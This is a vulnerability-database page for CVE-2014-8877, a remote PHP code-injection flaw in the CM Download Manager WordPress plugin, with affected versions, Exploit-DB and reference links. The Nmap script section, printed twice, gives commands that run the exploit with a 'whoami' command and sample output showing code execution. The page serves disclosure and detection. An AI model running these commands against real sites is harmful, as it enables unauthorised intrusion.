Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
10
CVSSv2

CVE-2014-8877

Published: 05/12/2014 Updated: 09/10/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Cm Download Manager

Vulnerability Summary

The alterSearchQuery function in lib/controllers/CmdownloadController.php in the CreativeMinds CM Downloads Manager plugin prior to 2.0.4 for WordPress allows remote malicious users to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/, which is processed by the PHP create_function function.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

creative minds cm download manager

creative minds cm download manager 2.0.2

creative minds cm download manager 2.0.1

creative minds cm download manager 2.0.0

Exploits

Exploit DB: WordPress Plugin CM Download Manager 2.0.0 - Code Injection
# Vulnerability title: Code Injection in Wordpress CM Download Manager plugin 200 # CVE: CVE-2014-8877 # Plugin: CM Download Manager plugin # Vendor: CreativeMinds - wwwcmindscom/ # Link download: wordpressorg/plugins/cm-download-manager/ # Affected version: 200 and previous version # Fixed version: 204 # Google dork: inur ...
Exploit DB: WordPress CM Download Manager 2.0.0 Code Injection
WordPress CM Download Manager plugin versions 200 and below suffer from a code injection vulnerability ...

Nmap Scripts

http-vuln-cve2014-8877

Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.

nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
nmap --script http-vuln-cve2014-8877 <target>

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-8877:
|   VULNERABLE:
|   Code Injection in Wordpress CM Download Manager plugin
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-8877
|       CM Download Manager plugin does not correctly sanitise the user input
|       which allows remote attackers to execute arbitrary PHP code via the
|       CMDsearch parameter to cmdownloads/, which is processed by the PHP
|       'create_function' function.
|
|     Disclosure date: 2014-11-14
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877
http-vuln-cve2014-8877

Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.

nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
nmap --script http-vuln-cve2014-8877 <target>

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-8877:
|   VULNERABLE:
|   Code Injection in Wordpress CM Download Manager plugin
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-8877
|       CM Download Manager plugin does not correctly sanitise the user input
|       which allows remote attackers to execute arbitrary PHP code via the
|       CMDsearch parameter to cmdownloads/, which is processed by the PHP
|       'create_function' function.
|
|     Disclosure date: 2014-11-14
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877

Github Repositories

https://github.com/aozhigov/modsecurity_curs

Описание структуры проекта logmakerpy - скрипт для приведения логов dump_io в нормальный вид, умеет разделять по временным меткам следующие запросы: GET, POST, HEAD, OPTIONS python logmakerpy [файл_с_логами_dumpio] [выходной_файл]

References

CWE-94http://www.securityfocus.com/bid/71204http://packetstormsecurity.com/files/129183/WordPress-CM-Download-Manager-2.0.0-Code-Injection.htmlhttps://downloadsmanager.cminds.com/release-notes/http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.htmlhttp://www.securityfocus.com/archive/1/534037/100/0/threadedhttps://nvd.nist.govhttps://github.com/aozhigov/modsecurity_curshttps://www.exploit-db.com/exploits/35324/https://nmap.org/nsedoc/scripts/../scripts/http-vuln-cve2014-8877.html
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2022-38028CVE-2024-32406CVE-2024-25624IMAPCVE-2024-2310CVE-2024-0874CVE-2024-20359XXEremote code execution
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook